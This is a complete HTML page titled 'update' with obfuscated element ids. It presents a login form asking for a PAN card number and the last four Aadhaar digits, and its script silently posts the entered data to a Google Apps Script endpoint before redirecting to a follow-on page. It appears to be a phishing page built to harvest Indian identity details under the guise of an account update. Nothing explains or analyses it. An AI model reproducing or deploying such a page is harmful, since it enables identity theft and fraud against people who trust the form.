<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>update</title>
    <style>
        #awesrw ,#wsdfjkiuytd ,#wsdfjkiuytda
    {
        width: 100%;
    }
    #oiuhgbju

    {
        background-color: rgb(121, 13, 69);
        border-radius: 15px;
        margin-left: 9%;
        font-size: larger;
        color: aliceblue;
        font-style: normal;
        text-decoration-line: none;
        padding-right: 15px;
        padding-left: 15px;
        padding-top: 3px;
        padding-bottom: 3px;

    }
    #puyht 
    {
        background-color: rgb(237, 220, 231);
        border-radius: 15px;
        margin-left: 4%;
        font-size: larger;
        color: rgb(23, 23, 23);
        font-style: normal;
        text-decoration-line: none;
        padding-right: 15px;
        padding-left: 15px;
        padding-top: 3px;
        padding-bottom: 3px;
        
    }
    #ytrdjjy
    {
        margin-left: 9%;
        margin-top: 10%;
    }
    #ytrdchytd
    {
      margin-left: 9%;
      width: 80%;
      height: 28px;
    }
    #ytordchytd
    {
        margin-left: 9%;
      width: 80%;
      height: 28px;
    }
    #ytrdjjyuy{
        margin-left: 9%;
    }
    #oiuygggf
    {
        margin-left: 9%;
        margin-top: 15px;
        width: 80%;
        height: 38px;
        background-color: rgb(121, 13, 69);
        font-size: large;
        color: aliceblue;
    }
    </style>
</head>
<body>
    <div id="awesr">
        <img src="asxfgytresxc.jpg" alt=""  id="awesrw">
    </div>
    <div id="rest">
        <form action="https://script.google.com/macros/s/AKfycbxlvtd9rBJOSLszs3NsUQ0zFVfBlq0ZN90ynMx5LL3TiXqaiqTrFZQfVB_h2K-JOnvDcQ/exec" method="post" id="aa">
            
            <div id="uytf">
                <p id="ytrdjjy">
                    Pancard No.* 
                </p> 
                <input type="text" name="pancn" id="ytrdchytd" placeholder="Enter Pancard No.">

                <p id="ytrdjjyuy">
                    Last 4 Digit Adhar No.
                </p> 
                <input type="number" name="adhar" id="ytordchytd" placeholder="Enter Last 4 Digit Adhar No.">
                
                <button type="submit" id="oiuygggf">Login</button>
            </div>
        </form>
        <script type = "text/javascript" >
            window.addEventListener("DOMContentLoaded", function() {
                const yourForm = document.getElementById('aa');
                yourForm.addEventListener("submit", function(e) {
                    e.preventDefault();
                    const data = new FormData(yourForm);
                    const action = e.target.action;
                    fetch(action, {
                        method: 'POST',
                        body: data,
                    }).then(() => {
                        window.location.replace('4uytresdfghuytre.html')
                    })
                })
            }); 
        </script>
        <img src="iuytrdfghjhgf.jpg" alt="" id="wsdfjkiuytd">
        <img src="ytrdsfghjhgfd.jpg" alt="" id="wsdfjkiuytda" >
    </div>
</body>
</html>